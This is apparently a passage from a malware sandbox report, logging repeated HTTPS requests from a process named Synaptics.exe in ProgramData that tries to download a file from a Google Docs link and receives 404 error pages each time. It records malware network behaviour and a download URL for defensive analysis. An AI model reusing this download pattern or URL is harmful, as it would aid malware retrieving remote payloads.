                                                                                                                                                                                        2022-05-17 11:31:32 UTC74INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:32 UTC75INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        230192.168.2.350007142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:59 UTC692OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:00 UTC695INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:00 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5JGtKpYwSay2d98x2LrZqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:00 UTC697INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:00 UTC697INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 4c 46 56 47 67 5a 6b 45 51 4a 71 34 53 57 68 53 46 64 4b 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GLFVGgZkEQJq4SWhSFdK0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:00 UTC698INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:00 UTC698INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        231192.168.2.350008142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:00 UTC695OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:00 UTC698INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:00 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PrZs7XFycLkPcWCh+CVJ+w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:00 UTC700INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 54 33 41 59 37 42 78 42 36 6d 68 56 70 4f 65 6d 56 4f 52 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7T3AY7BxB6mhVpOemVORLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:00 UTC701INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:00 UTC701INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        232192.168.2.350009142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:00 UTC698OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:00 UTC702INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:00 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-RbnaDV3ZBP/NOFcpqRdtCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:00 UTC703INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 64 37 5a 73 39 36 4c 48 7a 4b 79 4f 58 4c 32 4e 4c 63 39 7a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ud7Zs96LHzKyOXL2NLc9zg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:00 UTC704INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:00 UTC705INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        233192.168.2.350010142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:00 UTC701OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:00 UTC705INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:00 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uQ49sn7WQAhLSXW+n/VSiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:00 UTC706INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 73 72 67 71 32 71 39 6c 57 51 47 6c 44 4c 75 76 69 43 55 38 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Asrgq2q9lWQGlDLuviCU8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:00 UTC708INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:00 UTC708INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        234192.168.2.350011142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:00 UTC705OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:00 UTC708INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:00 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ITCCJgCxL0bN9/EXngeOmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:00 UTC709INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 4f 79 51 37 35 5a 30 44 2b 79 6a 33 4c 74 6f 42 4e 57 38 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MOyQ75Z0D+yj3LtoBNW8Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:00 UTC711INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:00 UTC711INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        235192.168.2.350012142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
